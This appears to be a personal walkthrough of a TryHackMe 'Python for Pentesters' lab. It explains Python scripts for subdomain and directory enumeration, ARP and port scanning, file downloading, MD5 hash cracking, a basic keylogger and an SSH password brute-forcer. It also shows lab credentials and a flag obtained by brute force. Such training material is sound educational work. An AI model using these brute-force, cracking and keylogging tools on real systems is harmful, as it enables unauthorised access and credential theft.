LEARN >> Python For Pentesters

This is where the fun begins!

This room is not intended to turn you into a Python master… as a penetration tester you do not need to become a full-fledged programmer, but having a basic understanding and the ability to whip out a new tool or script to automate something is definitely a bonus!

Task 1 – Introduction

Python can be the most powerful tool in your arsenal as it can be used to build almost any of the other penetration testing tools.

As mentioned in the description above, this room does not intend to teach you everything you need to know about Python, but will give you pointers on which you can build and improve. The example "tools" we will be building in this room are only one way of writing code to get the intended result; they are not "the only" or necessarily "the correct" way of doing so either – the goal is to build quick and effective tools that will help in our daily tasks.

Throughout this room we will learn how to:

  • Use Python to enumerate the target’s subdomains
  • Build a simple keylogger
  • Scan the network to find target systems
  • Scan any target to find the open ports
  • Download files from the internet
  • Crack hashes

Any code you will find in this room can be compiled using simple tools such as PyInstaller and sent to the target system.



Task 2 – Subdomain Enumeration

One of the best features of Python for a pentester is its ability to automate tasks – any task that has to be performed regularly is worth automating, and Python makes that easy!

Finding subdomains used by the target organization is an effective way to increase the attack surface and discover more vulnerabilities.

The script will use a list of potential subdomains (that we provide) and prepend them to the domain name provided, then try to connect to each subdomain via http – if it gets a connection back then it reports the subdomain as "valid".

NOTE: the person who created this room not only failed to attach the subdomains.txt list (and it’s not even on the AttackBox as promised), but there is also a lack of detail on the box in the room (as in the hostname)… so assuming that we had to use this script against the box in the room, I re-wrote the list from the screenshot of subdomains.txt, and then I had to add the IP to /etc/hosts and set it to target.thm. I got no results back, even when I ran it with wordlist2.txt, but when I ran it against tryhackme.com it did work. This could be due to the way vhosts are set up on the web server.

SOURCE >> sub_enum.py

#!/usr/bin/env python3
import requests 
import sys 

sub_list = open("subdomains.txt").read() 
subdoms = sub_list.splitlines()

for sub in subdoms:
    sub_domains = f"http://{sub}.{sys.argv[1]}" 

    try:
        requests.get(sub_domains)

    except requests.ConnectionError: 
        pass

    else:
        print("Valid domain: ",sub_domains)
Code Breakdown!

Unlike the previous room, this won’t break down EVERYTHING, just the new things that appear on the way… 🙂

NOTE: these breakdowns are additional to the room, you won’t find this in there! In saying that though, this is my understanding of the code, I don’t 100% guarantee it is correct!

  • Let’s break it down:
    • The very first line is not really Python code. Python treats it as a comment because it begins with #, but your shell reads it as a "shebang": it points the shell to the correct program to run the file with. Once you mark the file as executable with chmod +x, you can call it simply by typing ./sub_enum.py instead of python3 sub_enum.py
    • sub_list opens the wordlist (make sure that file exists!) and, because the command ends in .read(), it reads the contents of the file directly into the variable, rather than just holding a file object that we would have to .read() elsewhere anyway… saving us a line of code!
    • subdoms uses .splitlines() to split that text into a list with one string per line. This is how we load data for use in a for loop.
    • The string being set on sub_domains has an intentional f before the opening quotation mark – this is a relatively new (Python 3.6+) method of formatting strings called an f-string. Prepending the string with f enables the new formatting method, which allows you to reference variables in a much cleaner way. This code is using {} brackets to signify what variable it wants in its place, but there are plenty of other things you can do in between those brackets…
    • The rest of the code extends what we have learned so far about for loops. It uses try: / except: / else:, which works a bit like an if statement on each iteration, but with a difference… requests.get() doesn’t return true or false the way an if condition would. If the connection fails, it raises a requests.ConnectionError exception instead. So, as the code shows above, it will try: to request a connection to sub_domains; except if that raised a ConnectionError, in which case it does nothing (pass), the else: block is skipped and the loop moves on to the next subdomain; else: (no exception was raised) we print the successful connection in a message to the user, ensuring they know which sub_domain was successful. Note that any HTTP response counts as "valid" here, even a 404, because only a failed connection raises ConnectionError. This method is good if there is only one situation to handle, but we will touch on more later…
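
To make the try: / except: / else: flow a bit more concrete, here is a minimal offline sketch. Everything in it is made up for illustration: fake_get is a hypothetical stand-in for requests.get(), KNOWN_HOSTS is invented test data, and Python’s built-in ConnectionError stands in for requests.ConnectionError so it runs without a network.

```python
# Made-up hosts that "exist"; everything else fails to connect.
KNOWN_HOSTS = {"www.example.thm", "mail.example.thm"}

def fake_get(url):
    """Hypothetical stand-in for requests.get(): raises on failure."""
    host = url.split("://", 1)[1]
    if host not in KNOWN_HOSTS:
        raise ConnectionError(f"cannot reach {host}")
    return "some response"

def find_valid(subs, domain, get=fake_get):
    """Return the URLs that could be fetched without a ConnectionError."""
    valid = []
    for sub in subs:
        url = f"http://{sub}.{domain}"
        try:
            get(url)
        except ConnectionError:
            pass                # nothing to do; the else block is skipped
        else:
            valid.append(url)   # runs only when no exception was raised
    return valid

print(find_valid(["www", "dev", "mail"], "example.thm"))
```

The point to take away is that a failed connection never shows up as a return value; it only shows up as an exception, which is why an if statement on its own would not be enough here.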



Task 3 – Directory Enumeration

As is often pointed out, reconnaissance is one of the most critical steps to the success of a penetration testing engagement. Once subdomains have been discovered, the next step would be to find directories (or files).

SOURCE >> dir_enum.py

import requests 
import sys 

sub_list = open("wordlist2.txt").read() 
directories = sub_list.splitlines()

for dir in directories:
    dir_enum = f"http://{sys.argv[1]}/{dir}.html" 
    r = requests.get(dir_enum)
    if r.status_code==404: 
        pass
    else:
        print("Valid directory:" ,dir_enum)
Code Breakdown
  • OK let’s break it down!:
    • The code in this project compared to the last is very similar… the first important change is in dir_enum – instead of searching for subdomains we are "supposedly" searching for directories… however, notice the .html at the end of the URL? This is actually intentional for scanning the target box for this task, but if you want to turn this into a real directory scanner, switch out that .html for a /
    • The second change in this project is how the for loop is handled… because the request has been put into the variable r we can then use if / else to do our check… we are passing if r.status_code is equal to 404. r.status_code holds the HTTP response code, and 404 is "file not found". Using if / elif / … / else you could extend this loop to respond to multiple conditions for data returned from r… or anything else you dream!

Here is an example of how we could extend that loop:

for dir in directories:
    dir_enum = f"http://{sys.argv[1]}/{dir}.html"
    # requests follows redirects by default, so turn that off to see 301/302
    r = requests.get(dir_enum, allow_redirects=False)
    if r.status_code==404:
        print("404 - NOT FOUND!:", dir_enum)
    elif r.status_code==403:
        print("403 - FORBIDDEN!:", dir_enum)
    elif r.status_code==302:
        print("302 - MOVED TEMP:", dir_enum)
    elif r.status_code==301:
        print("301 - MOVED PERM:", dir_enum)
    else:
        print(f"{r.status_code} -    IS OK?! >> {dir_enum}")
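
If the elif chain starts getting long, one alternative is to let the standard library name the status codes for you. This is just a sketch of that idea, not something from the room: describe is a hypothetical helper, and it relies on http.HTTPStatus, which ships with Python.

```python
from http import HTTPStatus

def describe(status_code):
    """Return e.g. '404 - Not Found' for a numeric HTTP status code."""
    try:
        phrase = HTTPStatus(status_code).phrase
    except ValueError:          # code not defined in the standard library
        phrase = "unknown status"
    return f"{status_code} - {phrase}"

for code in (404, 403, 302, 301):
    print(describe(code))
```

In the scanner you would call describe(r.status_code) in place of the hand-written messages.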

Scanning the target…

Ok so using this script against the target box in this room we get 4 hits:

❯ ./direnum.py 10.10.75.155
Valid directory: http://10.10.75.155/surfer.html
Valid directory: http://10.10.75.155/private.html
Valid directory: http://10.10.75.155/apollo.html
Valid directory: http://10.10.75.155/index.html
surfer.html

Titled "Notes for Matt", this page contains logins and passwords … to what I have no idea!

# Notes for Matt

## Passwords set are:

-   Password for Madhatter set to MyCupOfTea
-   Password for Rabbit set to LOUSYRABBO
-   Password for Alice set to OnWithTheirHeads

## Users created are:

-   tiffany
-   daniel
-   jim
-   mike
private.html

This is your run-of-the-mill login form… none of the credentials under "Passwords" above are valid…

apollo.html

A short crypto string… an MD5 hash, actually, that cracks to rainbow.

cd13b6a6af66fb774faa589a9d18f906






Task 4 – Network Scanner

Python could easily be used to build a simple ICMP (Internet Control Message Protocol) scanner to "ping" a host to see if it is online, but the problem with that is ICMP is either disabled, blocked or set to not respond on most systems / firewalls these days. If we are scanning a local network, it is much more effective to use ARP (Address Resolution Protocol) to identify other targets on the network.

SOURCE >> arp_scan.py

from scapy.all import *

interface = "eth0"
ip_range = "10.10.X.X/24"
broadcastMac = "ff:ff:ff:ff:ff:ff"

packet = Ether(dst=broadcastMac)/ARP(pdst = ip_range) 

ans, unans = srp(packet, timeout =2, iface=interface, inter=0.1)

for send,receive in ans:
        print (receive.sprintf(r"%Ether.src% - %ARP.psrc%"))     
Code Breakdown
  • Let’s break it down! :
    • For usage sake, you need to update interface and ip_range to suit your network… e.g. interface= "eth0" and ip_range = "192.168.68.0/24" – you can leave broadcastMac alone…
    • packet holds the details of the packet to send: it basically equates to an Ethernet frame addressed to broadcastMac, carrying an ARP request for every address in ip_range
    • ans, unans are two variables set from the pair of lists that srp() returns… ans is for packets that got an answer, unans is for those that did not. srp() is the scapy function that sends the ARP packet we declared previously and collects the replies, with a timeout of 2 seconds, on the interface we entered above. The inter option is the time in seconds to wait between sending each packet.
    • The for loop walks through ans, where each entry is a pair: the packet we sent (send) and the reply we received (receive). It prints the details of each reply.
    • The print() function forks off to a special output from scapy called sprintf() that can properly format the data received… in this case it prints the MAC address with %Ether.src% and the IP with %ARP.psrc% (both seemingly referencing the source address that it received a response packet from).
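
If you are wondering how many addresses an ip_range like the one above actually covers, the standard library can tell you before you send a single packet. A small sketch, assuming the example range from the breakdown; hosts_in is a hypothetical helper name and is not part of scapy.

```python
import ipaddress

def hosts_in(ip_range):
    """List the usable host addresses inside a CIDR range."""
    # strict=False also accepts a host address such as 192.168.68.10/24
    network = ipaddress.ip_network(ip_range, strict=False)
    return [str(host) for host in network.hosts()]

targets = hosts_in("192.168.68.0/24")
print(len(targets), targets[0], targets[-1])
```

A /24 leaves out the network and broadcast addresses, which is why the count comes out slightly under 256.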




Task 5 – Port Scanner

And now for one of the most popular enumeration methods – a port scanner!

SOURCE >> port_scanner.py

import sys
import socket
import pyfiglet

ascii_banner = pyfiglet.figlet_format("TryHackMe \n Python 4 Pentesters \nPort Scanner")
print(ascii_banner)

ip = '192.168.1.6' 

open_ports =[] 
ports = range(1, 65536)  # range() excludes the end value, so this covers 1-65535

def probe_port(ip, port, result = 1): 
  try: 
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
    sock.settimeout(0.5) 
    r = sock.connect_ex((ip, port))   
    if r == 0: 
      result = r 
    sock.close() 
  except Exception as e: 
    pass 
  return result

for port in ports: 
    sys.stdout.flush() 
    response = probe_port(ip, port) 
    if response == 0: 
        open_ports.append(port) 

if open_ports: 
  print ("Open Ports are: ") 
  print (sorted(open_ports)) 
else: 
  print ("Looks like no ports are open :(")
Code Breakdown
  • Breakdown time!:
    • This time we are using socket, making TCP connections to test if the ports are accepting connections. Ignore that pyfiglet import… it’s responsible for that massive ugly banner!
    • Now is probably as good a time as any to mention that you don’t actually need to declare imports one per line – you could shorten the top 3 lines to import sys,socket,pyfiglet
    • The ip variable needs to be modified to change the target ip… eww!
    • open_ports =[] starts an empty list inside the open_ports variable, this is where the script will store the open ports for output at the end.
    • ports sets the range() of ports to scan. Keep in mind that range() excludes its end value, so the end has to be 65536 for port 65535 to be included.
    • The probe_port function checks a given ip and port and returns whether it was open (0) or closed (1)… also notice result = 1 at the end of the def. That is a default value rather than a required argument: it sets result to 1 (which is a fail) before the check runs… let’s dive a bit deeper though:
    • The try: block sets up a socket using socket.socket(), sets a timeout on that socket of 0.5 seconds, then sets r to the return value of sock.connect_ex(), which tries to connect to the port it is scanning on the IP set above and returns 0 on success or an error code on failure.
      • If r == 0 (meaning it got a connection to the port) it sets the result variable to 0 as well (what the function returns). The socket is closed with sock.close() either way.
    • The except block runs if any exception is raised inside the try: block (the as e part stores the exception in e, which is not used here). This means something went wrong with the connection, so it simply passes to the end of the function.
    • Finally, the function returns its result.
    • The for loop is pretty easy to understand – it loops through each port and simply sets response to the result of probe_port on the current port… if it equals 0 it appends the port to the open_ports list.
    • The final if statement simply either prints the list of open ports, or that it didn’t find anything.
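
To see connect_ex() return 0 for an open port and something else for a closed one without touching a real target, you can scan your own machine. The sketch below is my own variation rather than the room’s code: it opens a throwaway listener on 127.0.0.1, probes it, closes it and probes again. This probe_port returns True / False instead of 0 / 1, and the listener setup is purely for the demo.

```python
import socket

def probe_port(ip, port, timeout=0.5):
    """Return True if a TCP connection to ip:port succeeds."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(timeout)
        return sock.connect_ex((ip, port)) == 0   # 0 means connected

# Open a throwaway listener so there is something to find.
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener.bind(("127.0.0.1", 0))    # port 0 = let the OS pick a free port
listener.listen(1)
port = listener.getsockname()[1]

open_while_listening = probe_port("127.0.0.1", port)
listener.close()
open_after_close = probe_port("127.0.0.1", port)

print(open_while_listening, open_after_close)
```

Using with on the socket means it is closed even if something goes wrong, which replaces the separate sock.close() call.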

BONUS >> port_skam.py

I couldn’t help but overhaul this one a little…

#!/usr/bin/env python3
import sys,socket,pyfiglet

ascii_banner = pyfiglet.figlet_format("portSKAM")
print(ascii_banner)

if len(sys.argv) > 1:
    ip = sys.argv[1]
else:
    print(f"      USAGE >> {sys.argv[0]} <IP-ADDRESS>")
    print("")
    sys.exit()

ports = range(1, 65536)  # range() excludes the end value, so this covers 1-65535
c = 0

def probe_port(ip, port, result = 1):
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(0.5)
        r = sock.connect_ex((ip, port))
        if r == 0:
            result = r
            print(str(port) + " / ", end="", flush=True)
        sock.close()
    except Exception as e:
        pass
    return result

print(f"     TARGET >> {ip}")
print(" PORTS OPEN >> ", end="", flush=True)

for port in ports:
    sys.stdout.flush()
    response = probe_port(ip, port)
    if response == 0:
        c = c + 1

print(f"** {c} PORTS FOUND OPEN **")
Quick Bonus Breakdown
  • Let’s look at the main differences:
    • I ditched that super long banner for a simple "portSKAM" … looks better. 😉
    • Instead of hard-coding an IP, we want a script that we can choose the IP at runtime – the if statement checks the length of the command line, if it is larger than 1 it grabs the IP from the command line arguments, if not, it prints a quick usage and quits.
    • Directly under the ports range, we set c = 0 – this is our open port count.
    • An eagle-eye would have noticed an extra print() in the probe_port function… this prints the found port on the screen, but the key additions are , end="", flush=True. When it prints the current port (with a trailing " / ") it doesn’t end the line with a new line (end="") and flush=True ensures Python prints that text immediately. By default output can be buffered, so text without a new line may not show up straight away; flushing forces it out. The intended effect is that as soon as it finds a port, it prints it directly to screen on the same line, and you don’t have to wait until the end to find out what is open.
    • The second print() line above the for loop is actually the start of the line where it will print ports… or not!
    • The for loop is almost identical to the previous version, except that instead of appending ports to open_ports (which is gone from this version), we increase our count c by 1.
    • The last line, instead of the previous if statement, simply prints how many open ports it found, and it ends up at the end of the PORTS OPEN >> line… if no ports are found then all the user will see is ** 0 PORTS FOUND OPEN **, otherwise that 0 will be replaced by the number it did find open.
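
Here is a tiny sketch of how end="" stitches the separate print() calls into one line. It writes into an io.StringIO buffer instead of the screen so the result can be inspected; render and the port numbers are made up for the demo.

```python
import io

def render(open_ports, out):
    """Write the one-line port summary to the file-like object out."""
    print(" PORTS OPEN >> ", end="", file=out, flush=True)
    for port in open_ports:
        # no newline, so the next print continues on the same line
        print(str(port) + " / ", end="", file=out, flush=True)
    print(f"** {len(open_ports)} PORTS FOUND OPEN **", file=out)

buf = io.StringIO()
render([22, 80], buf)
print(repr(buf.getvalue()))
```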
Example Bonus Output
❯ ./port_scanner.py 192.168.68.121
                  _   ____  _  __    _    __  __
 _ __   ___  _ __| |_/ ___|| |/ /   / \  |  \/  |
| '_ \ / _ \| '__| __\___ \| ' /   / _ \ | |\/| |
| |_) | (_) | |  | |_ ___) | . \  / ___ \| |  | |
| .__/ \___/|_|   \__|____/|_|\_\/_/   \_\_|  |_|
|_|

     TARGET >> 192.168.68.121
 PORTS OPEN >> 1716 / 8088 / 43339 / 54102 / 55572 / 59914 / 60490 / ** 7 PORTS FOUND OPEN **






Task 6 – File Downloader

On Linux, we have wget or curl – on Windows, we have certutil or a range of PowerShell methods…

Python can download files too! 🙂

SOURCE >> web_dl.py

import requests

url = 'https://assets.tryhackme.com/img/THMlogo.png'
r = requests.get(url, allow_redirects=True)
open('THMlogo.png', 'wb').write(r.content)

The code above uses the requests library to download url via requests.get() and uses open() to write the file to disk.

  • You could shorten this to one line like this:
python -c 'import requests; r = requests.get("<URL>"); open("<OUT_FILE>", "wb").write(r.content)'

(replace <URL> with url to file, <OUT_FILE> to the filename to save to)
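
If requests is not installed wherever you end up running this, the standard library can do the same job. A minimal sketch using urllib.request; the download helper is a hypothetical name, and the file:// URL is only there so the example runs without a network (swap in an http(s) URL for real use).

```python
import tempfile
import urllib.request
from pathlib import Path

def download(url, out_file):
    """Fetch url and write the raw bytes to out_file."""
    with urllib.request.urlopen(url) as resp, open(out_file, "wb") as fh:
        fh.write(resp.read())
    return out_file

# Demo: "download" a local file through a file:// URL.
tmp = Path(tempfile.mkdtemp())
src = tmp / "source.bin"
src.write_bytes(b"hello from a local file")

dst = download(src.as_uri(), tmp / "copy.bin")
print(dst.read_bytes())
```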

BONUS >> webdl.py

… or we could extend it to make it universal!

import sys
import requests,fnmatch

if len(sys.argv) > 2:
    url = sys.argv[1]
    outfile = sys.argv[2]
else:
    print(f"[-] USAGE >> {sys.argv[0]} <URL> <OUT-FILE>")
    print("")
    sys.exit()

print(f"Downloading: {url}")

r = requests.get(url, allow_redirects=True)

if r.status_code==404:
    print("404 - NOT FOUND! >> ", url)
elif r.status_code==403:
    print("403 - FORBIDDEN! >> ", url)
elif fnmatch.fnmatch(str(r.status_code), '5??'):
    print(f"{r.status_code} - SERVER ERROR! >> ", url)
else:
    # only write the file once we know the request succeeded
    with open(outfile, 'wb') as f:
        f.write(r.content)
    print(f"DOWNLOAD COMPLETE - saved as: {outfile}")

There is no real need for a breakdown on this one… this has all been explained before!
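
One thing worth knowing about matching the 5xx codes with fnmatch: fnmatch.filter() expects a list of names, so handing it a bare string makes it test one character at a time and nothing ever matches a three-character pattern. fnmatch.fnmatch() tests a single string, which is what we want here. A quick sketch, with is_server_error as a hypothetical helper:

```python
import fnmatch

def is_server_error(status_code):
    """True for any 5xx HTTP status code."""
    return fnmatch.fnmatch(str(status_code), "5??")

# filter() walks the string as "5", "0", "0", so the pattern never matches
print(fnmatch.filter("500", "5??"))
print(is_server_error(500), is_server_error(404))
```

A plain numeric check such as 500 <= status_code < 600 would do the same job without any pattern matching.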



NOTE: although there were links to PsExec included in this task (as it was used as an example to download), I tried to google "Unified Cyber Kill Chain" to try to find the correct answer for this… turns out this is not actually one of the "default" steps… take that for whatever you wish.


Task 7 – Hash Cracker

A hash is often used to safeguard passwords and other important data. As a penetration tester, you may need to find the cleartext value for several different hashes. The hashlib library in Python allows you to build hash crackers according to your requirements quickly.

hashlib is a powerful module that supports a wide range of algorithms:

Ignoring some of the more "exotic" ones you will see in the list above, hashlib will support most of the commonly used hashing algorithms.
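
You can ask hashlib what it supports on your own machine. The sketch below prints the algorithms every Python build is expected to provide, followed by any extras your local build adds; the exact output will differ between systems.

```python
import hashlib

# Algorithms hashlib promises on every platform
print(sorted(hashlib.algorithms_guaranteed))

# Extras provided by this particular Python / OpenSSL build
print(sorted(hashlib.algorithms_available - hashlib.algorithms_guaranteed))
```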

SOURCE >> hash_cracker.py

import hashlib
import pyfiglet

ascii_banner = pyfiglet.figlet_format("TryHackMe \n Python 4 Pentesters \n HASH CRACKER for MD 5")
print(ascii_banner)

wordlist_location = str(input('Enter wordlist file location: '))
hash_input = str(input('Enter hash to be cracked: '))

with open(wordlist_location, 'r') as file:
    for line in file.readlines():
        hash_ob = hashlib.md5(line.strip().encode())
        hashed_pass = hash_ob.hexdigest()
        if hashed_pass == hash_input:
            print('Found cleartext password! ' + line.strip())
            exit(0)
Code Breakdown
  • Let’s take a look at this…
    • input() is used to take input from the user to give the hash and wordlist
    • hash_ob stores the MD5 hash object for the line (stripped and encoded to bytes), created with hashlib.md5(). Note that MD5 is a hash, not encryption.
    • hashed_pass is set to that hash’s digest as a hexadecimal string
    • … the rest is pretty straight forward.
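
The same loop can be wrapped in a function and pointed at other algorithms by using hashlib.new() with the algorithm name. This is a sketch of that idea, not the room’s script: crack and the in-memory wordlist are made up for the example, and the target is the well-known MD5 hash of "password".

```python
import hashlib

def crack(target_hash, words, algorithm="md5"):
    """Return the first word whose digest matches target_hash, else None."""
    target = target_hash.strip().lower()
    for word in words:
        candidate = word.strip()
        digest = hashlib.new(algorithm, candidate.encode()).hexdigest()
        if digest == target:
            return candidate
    return None

# Lines as they would come out of a wordlist file, newline included
wordlist = ["123456\n", "letmein\n", "password\n"]
print(crack("5f4dcc3b5aa765d61d8327deb882cf99", wordlist))
```

Returning None instead of calling exit() makes it easy to reuse the function inside a bigger tool.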

BONUS >> craxMD5.py

import sys
import hashlib
import pyfiglet

ascii_banner = pyfiglet.figlet_format("craxMD5")
print(ascii_banner)

if len(sys.argv) > 2:
    wordlist = sys.argv[1]
    pw_hash = sys.argv[2]
else:
    print(f"[-] USAGE >> {sys.argv[0]} <WORDLIST> <HASH>")
    print("")
    sys.exit()

print(f"WORDLIST >> {wordlist}")
print(f"    HASH >> {pw_hash}")

with open(wordlist, 'r') as file:
    for line in file.readlines():
        print('CHECKING >> ', line.strip(), end='\x1b[1K\r')
        hash_ob = hashlib.md5(line.strip().encode())
        hashed_pass = hash_ob.hexdigest()
        if hashed_pass == pw_hash:
            print('   FOUND >> ' + line.strip())
            exit(0)
print('  FAILED >> no matches found!')




Task 8 – Keyloggers

Here is the source to the world’s simplest keylogger:

import keyboard
keys = keyboard.record(until ='ENTER')
keyboard.play(keys)

This will record all keypresses until the user hits Enter – then it plays back everything it recorded.

If you don’t have the keyboard module, install with pip3 install keyboard.




Task 9 – SSH Brute Forcing

Python is a powerful language with a plethora of modules available that further enhance its capabilities. Paramiko is an SSHv2 implementation that will be useful in building SSH clients and servers.

The example below shows one way to build an SSH password brute force attack script. As with everything in the programming world, there is rarely a "correct" way of doing something, and being that as a penetration tester we are not aiming to become programming masters, our aim is to simply create programs that do what we need for the current task.

SOURCE >> ssh_bf.py

import paramiko
import sys
import os

target = str(input('Please enter target IP address: '))
username = str(input('Please enter username to bruteforce: '))
password_file = str(input('Please enter location of the password file: '))

def ssh_connect(password, code=0):
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

    try:
        ssh.connect(target, port=22, username=username, password=password)
    except paramiko.AuthenticationException:
        code = 1
    ssh.close()
    return code

with open(password_file, 'r') as file:
    for line in file.readlines():
        password = line.strip()

        try:
            response = ssh_connect(password)

            if response == 0:
                 print('password found: '+ password)
                 exit(0)
            elif response == 1: 
                print('no luck')
        except Exception as e:
            print(e)
# no explicit close() needed: the with block closes the password file
Code Breakdown
  • Not much to say on this one, note the ssh_connect function for a basic usage of paramiko – in particular, the ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) line – this simply tells paramiko that if the target is new and we haven’t accepted its host key yet, to automatically accept it. The rest is pretty self-explanatory…
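
The loop itself does not care how a login attempt is made, so it can be tried out without paramiko or a target. In this sketch brute_force takes any function that returns True on a successful login; fake_login and its password are invented for the demo, and a real version would wrap the ssh.connect() call in its place.

```python
def brute_force(passwords, try_login):
    """Return the first password accepted by try_login, else None."""
    for line in passwords:
        password = line.strip()
        if not password:        # skip blank lines in the wordlist
            continue
        if try_login(password):
            return password
    return None

def fake_login(password):
    # Hypothetical check; a real one would attempt an SSH connection
    return password == "hunter2"

print(brute_force(["123456\n", "\n", "hunter2\n", "qwerty\n"], fake_login))
```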

Questions answered

❯ python3 ssh_bf.py 10.10.218.201 tiffany wordlist2.txt
 _                _       ____ ____  _   _
| |__  _ __ _   _| |_ ___/ ___/ ___|| | | |
| '_ \| '__| | | | __/ _ \___ \___ \| |_| |
| |_) | |  | |_| | ||  __/___) |__) |  _  |
|_.__/|_|   \__,_|\__\___|____/____/|_| |_|

  WORDLIST >> wordlist2.txt
 TARGET IP >> 10.10.218.201
      USER >> tiffany
FOUND PASS >> trustno1
❯ ssh tiffany@10.10.39.148
The authenticity of host '10.10.39.148 (10.10.39.148)' can't be established.
ED25519 key fingerprint is SHA256:FJZNNeeh64wHhjKrH/aNyKxKS5B2gm0t+kK5EcXBpiM.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.39.148' (ED25519) to the list of known hosts.
tiffany@10.10.39.148's password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 5.4.0-1029-aws x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Nov 30 08:15:53 UTC 2021

  System load:  0.0               Processes:           94
  Usage of /:   4.8% of 29.02GB   Users logged in:     0
  Memory usage: 18%               IP address for eth0: 10.10.39.148
  Swap usage:   0%

129 packages can be updated.
78 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Mon Jun 28 13:00:46 2021 from 10.9.2.216
$ cat flag.txt
THM-737390028


